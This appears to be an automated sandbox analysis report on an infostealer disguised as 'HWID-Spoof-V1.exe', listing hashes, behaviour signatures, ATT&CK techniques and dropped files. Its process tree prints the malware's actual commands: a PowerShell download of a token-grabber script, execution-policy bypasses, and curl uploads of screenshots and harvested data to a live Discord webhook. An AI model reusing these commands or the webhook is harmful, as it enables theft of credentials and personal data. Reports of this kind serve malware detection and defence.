Analysis

  • max time kernel
    70s
  • max time network
    87s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
  • submitted
    10-06-2023 02:14

General

  • Target

    HWID-Spoof-V1.exe

  • Size

    7.2MB

  • MD5

    845666770c06f55b2f10f7c6a82fe636

  • SHA1

    3487ab328bf81e278b4e16b40b25ce1d0c59d2ec

  • SHA256

    e640f584cd7f683c7f61e177e1775988513d8b1acd5f35c011faefcc6e9b5684

  • SHA512

    295e7f697eef95fc2e4832718f2b22f347699eca26a444664b3b276fd3a17e8a4813d3a18d406a7fab08ea3f4780949d9a313cae1895caa55f3ad908d835475d

  • SSDEEP

    3072:MMobR7ezAjLOZvmX1A5GWp1icKAArDZz4N9GhbkrNEkRFwi5VXQ267NSP819aOYM:ZeR7eamm4p0yN90QEaB6xSkvh

Malware Config

Signatures

  • Blocklisted process makes network request 6 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 42 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Detects Pyinstaller 3 IoCs
  • Delays execution with timeout.exe 1 IoCs
  • Gathers network information 2 TTPs 1 IoCs

    Uses commandline utility to view network configuration.

  • Modifies registry class 1 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 58 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\HWID-Spoof-V1.exe
    "C:\Users\Admin\AppData\Local\Temp\HWID-Spoof-V1.exe"
    1⤵
    • Adds Run key to start application
    • Suspicious use of WriteProcessMemory
    PID:4016
    • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
      Powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -Command "Copy-Item main.bat -Destination $env:TEMP\main.bat -Force ; Start-Process -FilePath $env:TEMP\main.bat -Verb RunAs -Wait ; Remove-Item $env:TEMP\main.bat -Force"
      2⤵
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2092
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\main.bat"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3676
        • C:\Windows\system32\net.exe
          net session
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:208
          • C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 session
            5⤵
              PID:684
          • C:\Windows\system32\findstr.exe
            findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\main.bat"
            4⤵
              PID:524
            • C:\Windows\system32\chcp.com
              chcp 65001
              4⤵
                PID:3412
              • C:\Windows\system32\net.exe
                net session
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:4044
                • C:\Windows\system32\net1.exe
                  C:\Windows\system32\net1 session
                  5⤵
                    PID:3988
                • C:\Windows\system32\findstr.exe
                  findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\main.bat"
                  4⤵
                    PID:5060
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    powershell -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "$bytes = [System.IO.File]::ReadAllBytes('C:\Users\Admin\AppData\Local\Temp\main.bat') ; if (($bytes[0] -ne 0xFF) -or ($bytes[1] -ne 0xFE) -or ($bytes[2] -ne 0x26)) { Write-Host 'The first 3 bytes of the file are not FF FE 0A.' ; taskkill /F /IM cmd.exe }"
                    4⤵
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2772
                  • C:\Windows\system32\net.exe
                    net session
                    4⤵
                    • Suspicious use of WriteProcessMemory
                    PID:4664
                    • C:\Windows\system32\net1.exe
                      C:\Windows\system32\net1 session
                      5⤵
                        PID:2004
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell -c "$t = Iwr -Uri 'https://raw.githubusercontent.com/KDot227/Powershell-Token-Grabber/main/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discordapp.com/api/webhooks/1115663028537532569/zHnNPFFO8Rb5o3twEleUghYxH7x7ZgaKf5Sm7JneE0uBXCh2IgDVCbLjYd9oPcrjYskm' | Out-File -FilePath 'powershell123.ps1' -Encoding ASCII"
                      4⤵
                      • Blocklisted process makes network request
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1244
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "$bytes = [System.IO.File]::ReadAllBytes('C:\Users\Admin\AppData\Local\Temp\main.bat') ; if (($bytes[0] -ne 0xFF) -or ($bytes[1] -ne 0xFE) -or ($bytes[2] -ne 0x26)) { Write-Host 'The first 3 bytes of the file are not FF FE 0A.' ; taskkill /F /IM cmd.exe }"
                      4⤵
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3024
                    • C:\Windows\system32\attrib.exe
                      attrib +h +s powershell123.ps1
                      4⤵
                      • Views/modifies file attributes
                      PID:1640
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Unrestricted -Force
                      4⤵
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3116
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell -noprofile -executionpolicy bypass -WindowStyle hidden -file powershell123.ps1
                      4⤵
                      • Blocklisted process makes network request
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of WriteProcessMemory
                      PID:4248
                      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\j4q40aaf\j4q40aaf.cmdline"
                        5⤵
                        • Suspicious use of WriteProcessMemory
                        PID:840
                        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8E6A.tmp" "c:\Users\Admin\AppData\Local\Temp\j4q40aaf\CSC160FFD61925F4A5198B6837EEEF760B6.TMP"
                          6⤵
                            PID:3156
                        • C:\Windows\system32\NETSTAT.EXE
                          "C:\Windows\system32\NETSTAT.EXE" -ano
                          5⤵
                          • Gathers network information
                          PID:404
                        • C:\Windows\system32\netsh.exe
                          "C:\Windows\system32\netsh.exe" wlan show profiles
                          5⤵
                            PID:2248
                          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hfmj0gyh\hfmj0gyh.cmdline"
                            5⤵
                            • Suspicious use of WriteProcessMemory
                            PID:3052
                            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES108A.tmp" "c:\Users\Admin\AppData\Local\Temp\hfmj0gyh\CSC65AF041F9794E44B2F3FBEEB7B99F10.TMP"
                              6⤵
                                PID:1560
                            • C:\Windows\system32\curl.exe
                              "C:\Windows\system32\curl.exe" -F "payload_json={\"username\": \"KDOT\", \"content\": \":hamsa: **Screenshot**\"}" -F file=@\"C:\Users\Admin\AppData\Local\temp\desktop-screenshot.png\" https://discordapp.com/api/webhooks/1115663028537532569/zHnNPFFO8Rb5o3twEleUghYxH7x7ZgaKf5Sm7JneE0uBXCh2IgDVCbLjYd9oPcrjYskm
                              5⤵
                                PID:1376
                              • C:\Users\Admin\AppData\Local\Temp\main.exe
                                "C:\Users\Admin\AppData\Local\Temp\main.exe" https://discordapp.com/api/webhooks/1115663028537532569/zHnNPFFO8Rb5o3twEleUghYxH7x7ZgaKf5Sm7JneE0uBXCh2IgDVCbLjYd9oPcrjYskm
                                5⤵
                                • Executes dropped EXE
                                • Suspicious use of WriteProcessMemory
                                PID:3412
                                • C:\Users\Admin\AppData\Local\Temp\main.exe
                                  "C:\Users\Admin\AppData\Local\Temp\main.exe" https://discordapp.com/api/webhooks/1115663028537532569/zHnNPFFO8Rb5o3twEleUghYxH7x7ZgaKf5Sm7JneE0uBXCh2IgDVCbLjYd9oPcrjYskm
                                  6⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  PID:404
                              • C:\Windows\system32\curl.exe
                                "C:\Windows\system32\curl.exe" -X POST -F "payload_json={\"username\": \"KDOT\", \"content\": \"\", \"avatar_url\": \"https://i.postimg.cc/k58gQ03t/PTG.gif\"}" -F file=@C:\Users\Admin\AppData\Local\Temp\KDOT.zip https://discordapp.com/api/webhooks/1115663028537532569/zHnNPFFO8Rb5o3twEleUghYxH7x7ZgaKf5Sm7JneE0uBXCh2IgDVCbLjYd9oPcrjYskm
                                5⤵
                                  PID:2028
                              • C:\Windows\system32\attrib.exe
                                attrib -h -s powershell123.ps1
                                4⤵
                                • Views/modifies file attributes
                                PID:3944
                              • C:\Windows\system32\timeout.exe
                                timeout 3
                                4⤵
                                • Delays execution with timeout.exe
                                PID:2992

                        Network

                        MITRE ATT&CK Matrix ATT&CK v6

                        Execution

                        Command-Line Interface

                        1
                        T1059

                        Persistence

                        Registry Run Keys / Startup Folder

                        1
                        T1060

                        Hidden Files and Directories

                        1
                        T1158

                        Defense Evasion

                        Modify Registry

                        1
                        T1112

                        Hidden Files and Directories

                        1
                        T1158

                        Credential Access

                        Credentials in Files

                        1
                        T1081

                        Discovery

                        System Information Discovery

                        1
                        T1082

                        Collection

                        Data from Local System

                        1
                        T1005

                        Command and Control

                        Web Service

                        1
                        T1102

                        Replay Monitor

                        Loading Replay Monitor...

                        Downloads

                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                          Filesize

                          2KB

                          MD5

                          d85ba6ff808d9e5444a4b369f5bc2730

                          SHA1

                          31aa9d96590fff6981b315e0b391b575e4c0804a

                          SHA256

                          84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                          SHA512

                          8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                          Filesize

                          944B

                          MD5

                          b98cf4ca327d4a7848b0799f796835ef

                          SHA1

                          f080fc252eea740cb720c769452fe099fc2480a6

                          SHA256

                          439a8a1aa5c09ab478a25226f008670a71b1d2215a8ba71317df380f56b72a3c

                          SHA512

                          44c76b5cf2116e7dcfb8adc0b2ef83c4cd5609a2cd9412717f6ba9d9585c6e33c18b64ba9e9efe085eaa8067805b5c48d9fd94651e06efa5e0be4d62f262fc63

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                          Filesize

                          1KB

                          MD5

                          704162a7d4c00eceed73583a5db40400

                          SHA1

                          cff30c76e4264dea03b75672298401b5378ddcff

                          SHA256

                          d078101d896007ff20c5735411917d308f8d27cb54e5289b7b605f73986c9ab0

                          SHA512

                          d0b5de843e9fb1abad42f6a225d1e71c9c5e6768989508df8007f5ceb55b77be0665d2d84a296bb2da9ecbf6cda002f6173ec34348ae78a2089c440686a4bca0

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                          Filesize

                          944B

                          MD5

                          7b543fe2ed6a8a856e8fe92facdc4de0

                          SHA1

                          339b05be7ff549ea085d038ba68f5ad00c845a88

                          SHA256

                          46b0e56f19331b712c14433501ebe1e3a8372ee62c242267ed84769321618878

                          SHA512

                          9db1ea5d61bb17b6c8c6d1a165b4d3caaf4d4768828a618c5ea98fc9cbd04ffdd378e64be83a72d6ce34ee4fc1126b7a7ff5dfbc10ff9f1e788556f8076b7488

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                          Filesize

                          1016B

                          MD5

                          c36e08c7aa8c44ff62c8c19d77e71a6c

                          SHA1

                          bf9161a4def197a4a8c129f933db1c110f02f976

                          SHA256

                          096abe323891d9cbc02122802904d1cc4e2e63b53e636ceb93fdf39e158ac83f

                          SHA512

                          117c7d63fb2ecd0a33bdc1ee343eda743dd607ff1c1343ed2950aa99cf14a206fb9e5953cc58373cbae16d07501d56c7761118536ca3ee8d39cb8a42b5785ff0

                        • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\kdotrelKi.bat
                          Filesize

                          166B

                          MD5

                          316af694a7d32cfe4616a0ad875cf357

                          SHA1

                          688862f38621d75ba88cc59ecbb3583cb7fc14eb

                          SHA256

                          7b64676bd0c4fe0f1a0291ba9d2985766ff32fdcd84c048618506f67b2aac75e

                          SHA512

                          6b2ed7f9c17c9495af13e63cc3297e6383d3ec94d150848d4a967cb9e32bb88896806cac5873ebfbb1c3fb677d6a687399d71982842ab79ec1f0a35aab2f531f

                        • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\main.bat
                          Filesize

                          1020KB

                          MD5

                          14a8813dee6c76682f952a2971d25ff2

                          SHA1

                          fa45396583999cc568fe68cf1335cd3c52652564

                          SHA256

                          462eedc4cd4d68582230a2204d019ea89125d778110ed0ca5bb6240675f72a2b

                          SHA512

                          1cea307973e2ac03ec87b39a5d8f482452254471f4fa60519f601d00825cef00547927bfe6332152124508eadcaaae59dbc5c4707aaf5eb49dfde8fdb477d5d0

                        • C:\Users\Admin\AppData\Local\Temp\KDOT\CPU.txt
                          Filesize

                          76B

                          MD5

                          6f53aae1e5885a7b626a39138707ffa9

                          SHA1

                          bf94085a35e40aebb7447eff7fbb2b0319f70bb4

                          SHA256

                          24fea3ea3d291bffb4a05f71f2eea3008a94214c7d2706e4a60d47fe44fcfe1a

                          SHA512

                          12e49f39ad1985da5906547907823411df9f390203c72ded3882b70a7a1fda437b369338db2cad1e6ca9261df2e68afd12e77a35d02e090c97765f0935487a3c

                        • C:\Users\Admin\AppData\Local\Temp\KDOT\DiskInfo.txt
                          Filesize

                          304B

                          MD5

                          156b4336e806bb6c2fc85d89b95a48a1

                          SHA1

                          6374eb686692a509ee7cb4a574c2457f2a30f32d

                          SHA256

                          d657460d0ead41ad03c270290ec9f67703ffe946d867f4fa8151b86c5f41c9e4

                          SHA512

                          99e79fe3bb4a0b1c3e0531528bdf9b6f184435c80c8eba31bbc5f9453c9ac31310e15ede37e0c1462114ca7a1e5b533366ac12ad7ea237c06d45d50464a7ddcc

                        • C:\Users\Admin\AppData\Local\Temp\KDOT\GPU.txt
                          Filesize

                          68B

                          MD5

                          caac31d027355bf7e9aac064c0ecda54

                          SHA1

                          05bd1300e21e1361108ca3fd05e3ce1984be5fae

                          SHA256

                          45bd7125a999074e2a7a96cdb3f06c2dbd8c45ecedbe9d65248e796a04764b8b

                          SHA512

                          7d59ea072f022c815996bb5783efa49215ab3df8035ecdf729ee476905353c7ff93f7d29b89bf8c84fc3e7833bf488191434e0934a4a8480d7427d9de33b0a32

                        • C:\Users\Admin\AppData\Local\Temp\KDOT\Installed-Applications.txt
                          Filesize

                          8KB

                          MD5

                          bcafeb552111f8acf54a23aec12675c3

                          SHA1

                          870f8b3c55fd692694ad3fd4046119957a878277

                          SHA256

                          7396ceff4719a3adf39fcde00a1651a3b914bd2c2421567e3f4f0861dccae050

                          SHA512

                          d258179d727e307be1e8f3ef7ae35c316ba1dc4360b0858dc6326a822e7ba74c58f1bb7d3f72b4405f184d7eb5742561cea44677b98f533db10473735b8e6b77

                        • C:\Users\Admin\AppData\Local\Temp\KDOT\NetworkAdapters.txt
                          Filesize

                          512B

                          MD5

                          13ea1838bf3c37282ef0842e31651e03

                          SHA1

                          6a71c12df2d35b694eceee59ab20666e33a5b5a0

                          SHA256

                          8ffe1078686391a135e8bb2b2c4ac4581a6c893e0adcb76bdd5c360dc4f7b1ea

                          SHA512

                          a8184f33d6b76efe1c1ea462c56af130f15db5bbec4f5e863d7ddb8b13c2a81b899881e02f12e7230ba0880118c7cb12ef273ae5931e404c15ee933615e3eeee

                        • C:\Users\Admin\AppData\Local\Temp\KDOT\ProductKey.txt
                          Filesize

                          64B

                          MD5

                          077d49fce459a986fc0c864f3486143d

                          SHA1

                          587801892a3e9d19af223e516a42fb545843f91c

                          SHA256

                          84407693be0afd3ff790836eb38588042a88f0126c9b60c3d85342a05b535455

                          SHA512

                          3feb4d4a0821c040c9a4604ca75314b8aaa72d883443d6c251fd66065111f3afa482f2ab42cf5aec36401cbfd390b0893292edbf33bb37fba81605758b7f3e0f

                        • C:\Users\Admin\AppData\Local\Temp\KDOT\StartUpApps.txt
                          Filesize

                          1KB

                          MD5

                          95fee84e4245b059dc7a5c93dcb47fb3

                          SHA1

                          fbae84b8c9a5493f623af7f160281ef5403f02ed

                          SHA256

                          e978950cb6186f5d8ff3c4692daa6b6a6b3e07f458f41cb308e5a674d534814e

                          SHA512

                          6a86fc5ce6b7d9202d483e6cdf504d19ea063179958eb3a5ffe17d300fd3fa8a4a9c013c321fcfb681d5acdfb56a900f6b330e92a79fecb7e186cfb6e273240f

                        • C:\Users\Admin\AppData\Local\Temp\KDOT\WIFIPasswords.txt
                          Filesize

                          10B

                          MD5

                          313f6ee67972c25292f2c6e3d5d1c381

                          SHA1

                          c90b4164504b3ab82cd69c58c38125b3a953cc50

                          SHA256

                          a2b6352f454bbbd559b5b753e606d2fddf9db438cfa062477496431ac7802c85

                          SHA512

                          c1d93f7c29d08029a16f36c2576e497ef928f4ba272120ec15551d77d0824ec21743cd2fd16e0dce071287b5414cf1d56831ca97f759b34d4dc64442a15786bd

                        • C:\Users\Admin\AppData\Local\Temp\KDOT\ip.txt
                          Filesize

                          30B

                          MD5

                          f8af37e0e5ad15d50070518e3858bf9a

                          SHA1

                          05a1c0b6921dbf80f7c4542aa7de9a8f5ed52476

                          SHA256

                          e8ea5773ea89c7c515a5c410f5db2aaa92a5985ad3ad09f50195f0e962fab0b3

                          SHA512

                          b2dd28ff9a7085e778a5ecee324c36c45a25b73f639cca29edc0bbb0c30e624329adfb223b97e2b86a387c871dfcc0f50ea2cc06e5f277cf9c77c294cd1d5300

                        • C:\Users\Admin\AppData\Local\Temp\KDOT\mac.txt
                          Filesize

                          40B

                          MD5

                          4e177331c91a933f7ddbf313c9ae2ad2

                          SHA1

                          721216df6b4a6b9d0342a2ba504b54a83c4101a5

                          SHA256

                          1ad7370c7ee3c54a64f5d30aab3dc2e762b1e08a5ed483e9d5aef2fdd20ec37b

                          SHA512

                          2c9477a5cdb80b6c341fca74a115a81affa21c46ceb145a05b8b16357ecbe69fdde0361c2217994481e01585c3a78e3a12b58dcc6a22aa8dae043626743e168c

                        • C:\Users\Admin\AppData\Local\Temp\KDOT\netstat.txt
                          Filesize

                          8KB

                          MD5

                          bd754adb2a6c12035e950440f9dcecb0

                          SHA1

                          c50b0a21daf51c0826efe73f3f3f9db35cc7526e

                          SHA256

                          cc9dfbb430d6f003c00cfd148f9ee1a3c69ca17493346b18ccda700765d9687d

                          SHA512

                          0947369a22769d57a6c2151d7c6378b9625ef94047a687269347fc76562c0ddc676c4e3253101fad80ac1c4a39bf487122cd2632d3b573ef6aa5dd643230fbdb

                        • C:\Users\Admin\AppData\Local\Temp\KDOT\running-applications.txt
                          Filesize

                          29KB

                          MD5

                          9ab201cc78e84650b1e2594fb4300ce1

                          SHA1

                          2fa5a439778b66282cf811c8505fb4d76f7bce5b

                          SHA256

                          ecffcbc602fe3283b01967ac50c25f23b2bd58eb2013060a2b0c88bcd2a08bd5

                          SHA512

                          cfbec7293144a109fb0cf543d891d49a76762757d00f0763e514c56f1eb597eae281e50c6f46e425880b68a06ab4008f2d112eb2afaeeea91aae203047538e5b

                        • C:\Users\Admin\AppData\Local\Temp\KDOT\running-services.txt
                          Filesize

                          19KB

                          MD5

                          bb2d6678b589c263f21610934d9f88a7

                          SHA1

                          140ef61450e1091b2188f01ecc2e9209789043ec

                          SHA256

                          dc8b1367846d73abf4a8124a874010160b91487325a47693a82dc2170a82aa4f

                          SHA512

                          7464a464a8e8dfd009adc53e1e10ec6d2d9eb91641ac5b11cf77104e2d119b68cc345c7f01ab6fc4f604edb9d4fd6be994f2bc143b20ca7187cf37f2ec0df63b

                        • C:\Users\Admin\AppData\Local\Temp\KDOT\system_info.txt
                          Filesize

                          24KB

                          MD5

                          bb33112b5033ef649281590c77d1c8f3

                          SHA1

                          d97528f1cc1b714d1c878778bdcb9f388c02a1c5

                          SHA256

                          e218f47e4b5f9d97e8b737cac687c07be5756e31a6a32ac41c7023ac80adf501

                          SHA512

                          6f3009b5cebda23f357901154c98bd5b709a61d9a4d2ccd582c9c2fd0f1b2fbba51ca475f7d6c0f864a6ea7438d67011fce3561f4b1c79cc21a752513794b5f2

                        • C:\Users\Admin\AppData\Local\Temp\KDOT\uuid.txt
                          Filesize

                          78B

                          MD5

                          afb801e22afd7dc227465d1dd2265025

                          SHA1

                          9b9bab6b75d8b16d89a166fe3b0627857e660004

                          SHA256

                          994d907fa9e9d185c1add16351bbba597cc5821fda9b194f5eda8f5eee8187b9

                          SHA512

                          fb94b871c694eea521dace7eee71aea1101dce79fe07f21cd8e87a2a293eb71beffd5b770f28aeef5869de4515798575ee4eab16b72fe451fa9ec0dcccd7a484

                        • C:\Users\Admin\AppData\Local\Temp\RES108A.tmp
                          Filesize

                          1KB

                          MD5

                          64cc0f8868e3a681cd943c27f00fdaa4

                          SHA1

                          ab79e7e7c52d852af2a489b4c49fed9eb20b6995

                          SHA256

                          b09452769ed34161d534b93b3ca1d0766a6c0113f693822da4b1e71ceccab7ef

                          SHA512

                          af885010ee447e6489214ac229adc0860bdb9d7b1fe747733932202a8a8c5529c7c9f0606a7c09fd857edddec1fb34b107ac7e3ee23226edda6a2d918fd28750

                        • C:\Users\Admin\AppData\Local\Temp\RES8E6A.tmp
                          Filesize

                          1KB

                          MD5

                          2b57000265c78dad46af0a80ca74cff7

                          SHA1

                          a9004deae30476a3d0b43b1cb3c01916c6c536fe

                          SHA256

                          227e72fcbf21dfc84deb7f35bfe9b173c09a07eebd91332bbfa9bba7b1870868

                          SHA512

                          b62aaa4b19e0c724020c59fccd6042d64756eef12278b4ed5c648a3babfe78e51dd1a9c13d2ac467255b03f1635083931af7be3584848449322e7fab5a2631a7

                        • C:\Users\Admin\AppData\Local\Temp\_MEI34122\Crypto\Cipher\_Salsa20.pyd
                          Filesize

                          13KB

                          MD5

                          e598d24941e68620aef43723b239e1c5

                          SHA1

                          fa3c711aa55a700e2d5421f5f73a50662a9cc443

                          SHA256

                          e63d4123d894b61e0242d53813307fa1ff3b7b60818827520f7ff20cabcd8904

                          SHA512

                          904e04fb28cffa2890c0cb4f1169a7cc830224740f0df3da622ac2eb9b8f8bdbb4de88836e40a0126be0eb3e5131a8d8b5aaacd782d1c5875a2fbbc939f78d5b

                        • C:\Users\Admin\AppData\Local\Temp\_MEI34122\Crypto\Cipher\_Salsa20.pyd
                          Filesize

                          13KB

                          MD5

                          e598d24941e68620aef43723b239e1c5

                          SHA1

                          fa3c711aa55a700e2d5421f5f73a50662a9cc443

                          SHA256

                          e63d4123d894b61e0242d53813307fa1ff3b7b60818827520f7ff20cabcd8904

                          SHA512

                          904e04fb28cffa2890c0cb4f1169a7cc830224740f0df3da622ac2eb9b8f8bdbb4de88836e40a0126be0eb3e5131a8d8b5aaacd782d1c5875a2fbbc939f78d5b

                        • C:\Users\Admin\AppData\Local\Temp\_MEI34122\Crypto\Cipher\_raw_cbc.pyd
                          Filesize

                          12KB

                          MD5

                          ff2c1c4a7ae46c12eb3963f508dad30f

                          SHA1

                          4d759c143f78a4fe1576238587230acdf68d9c8c

                          SHA256

                          73cf4155df136db24c2240e8db0c76bedcbb721e910558512d6008adaf7eed50

                          SHA512

                          453ef9eed028ae172d4b76b25279ad56f59291be19eb918de40db703ec31cddf60dce2e40003dfd1ea20ec37e03df9ef049f0a004486cc23db8c5a6b6a860e7b

                        • C:\Users\Admin\AppData\Local\Temp\_MEI34122\Crypto\Cipher\_raw_cbc.pyd
                          Filesize

                          12KB

                          MD5

                          ff2c1c4a7ae46c12eb3963f508dad30f

                          SHA1

                          4d759c143f78a4fe1576238587230acdf68d9c8c

                          SHA256

                          73cf4155df136db24c2240e8db0c76bedcbb721e910558512d6008adaf7eed50

                          SHA512

                          453ef9eed028ae172d4b76b25279ad56f59291be19eb918de40db703ec31cddf60dce2e40003dfd1ea20ec37e03df9ef049f0a004486cc23db8c5a6b6a860e7b

                        • C:\Users\Admin\AppData\Local\Temp\_MEI34122\Crypto\Cipher\_raw_cfb.pyd
                          Filesize

                          13KB

                          MD5

                          fe489576d8950611c13e6cd1d682bc3d

                          SHA1

                          2411d99230ef47d9e2e10e97bdea9c08a74f19af

                          SHA256

                          bb79a502eca26d3418b49a47050fb4015fdb24bee97ce56cdd070d0fceb96ccd

                          SHA512

                          0f605a1331624d3e99cfdc04b60948308e834aa784c5b7169986eefbce4791faa148325c1f1a09624c1a1340e0e8cf82647780ffe7b3e201fdc2b60bcfd05e09

                        • C:\Users\Admin\AppData\Local\Temp\_MEI34122\Crypto\Cipher\_raw_cfb.pyd
                          Filesize

                          13KB

                          MD5

                          fe489576d8950611c13e6cd1d682bc3d

                          SHA1

                          2411d99230ef47d9e2e10e97bdea9c08a74f19af

                          SHA256

                          bb79a502eca26d3418b49a47050fb4015fdb24bee97ce56cdd070d0fceb96ccd

                          SHA512

                          0f605a1331624d3e99cfdc04b60948308e834aa784c5b7169986eefbce4791faa148325c1f1a09624c1a1340e0e8cf82647780ffe7b3e201fdc2b60bcfd05e09

                        • C:\Users\Admin\AppData\Local\Temp\_MEI34122\Crypto\Cipher\_raw_ctr.pyd
                          Filesize

                          14KB

                          MD5

                          a33ac93007ab673cb2780074d30f03bd

                          SHA1

                          b79fcf833634e6802a92359d38fbdcf6d49d42b0

                          SHA256

                          4452cf380a07919b87f39bc60768bcc4187b6910b24869dbd066f2149e04de47

                          SHA512

                          5d8bdca2432cdc5a76a3115af938cc76cf1f376b070a7fd1bcbf58a7848d4f56604c5c14036012027c33cc45f71d5430b5abbfbb2d4adaf5c115ddbd1603ab86

                        • C:\Users\Admin\AppData\Local\Temp\_MEI34122\Crypto\Cipher\_raw_ctr.pyd
                          Filesize

                          14KB

                          MD5

                          a33ac93007ab673cb2780074d30f03bd

                          SHA1

                          b79fcf833634e6802a92359d38fbdcf6d49d42b0

                          SHA256

                          4452cf380a07919b87f39bc60768bcc4187b6910b24869dbd066f2149e04de47

                          SHA512

                          5d8bdca2432cdc5a76a3115af938cc76cf1f376b070a7fd1bcbf58a7848d4f56604c5c14036012027c33cc45f71d5430b5abbfbb2d4adaf5c115ddbd1603ab86

                        • C:\Users\Admin\AppData\Local\Temp\_MEI34122\Crypto\Cipher\_raw_ecb.pyd
                          Filesize

                          10KB

                          MD5

                          821aaa9a74b4ccb1f75bd38b13b76566

                          SHA1

                          907c8ee16f3a0c6e44df120460a7c675eb36f1dd

                          SHA256

                          614b4f9a02d0191c3994205ac2c58571c0af9b71853be47fcf3cb3f9bc1d7f54

                          SHA512

                          9d2ef8f1a2d3a7374ff0cdb38d4a93b06d1db4219bae06d57a075ee3dff5f7d6f890084dd51a972ac7572008f73fde7f5152ce5844d1a19569e5a9a439c4532b

                        • C:\Users\Admin\AppData\Local\Temp\_MEI34122\Crypto\Cipher\_raw_ecb.pyd
                          Filesize

                          10KB

                          MD5

                          821aaa9a74b4ccb1f75bd38b13b76566

                          SHA1

                          907c8ee16f3a0c6e44df120460a7c675eb36f1dd

                          SHA256

                          614b4f9a02d0191c3994205ac2c58571c0af9b71853be47fcf3cb3f9bc1d7f54

                          SHA512

                          9d2ef8f1a2d3a7374ff0cdb38d4a93b06d1db4219bae06d57a075ee3dff5f7d6f890084dd51a972ac7572008f73fde7f5152ce5844d1a19569e5a9a439c4532b

                        • C:\Users\Admin\AppData\Local\Temp\_MEI34122\Crypto\Cipher\_raw_ofb.pyd
                          Filesize

                          12KB

                          MD5

                          619fb21dbeaf66bf7d1b61f6eb94b8c5

                          SHA1

                          7dd87080b4ed0cba070bb039d1bdeb0a07769047

                          SHA256

                          a2afe994f8f2e847951e40485299e88718235fbefb17fccca7ace54cc6444c46

                          SHA512

                          ee3dbd00d6529fcfcd623227973ea248ac93f9095430b9dc4e3257b6dc002b614d7ce4f3daab3e02ef675502afdbe28862c14e30632e3c715c434440615c4dd4

                        • C:\Users\Admin\AppData\Local\Temp\_MEI34122\Crypto\Cipher\_raw_ofb.pyd
                          Filesize

                          12KB

                          MD5

                          619fb21dbeaf66bf7d1b61f6eb94b8c5

                          SHA1

                          7dd87080b4ed0cba070bb039d1bdeb0a07769047

                          SHA256

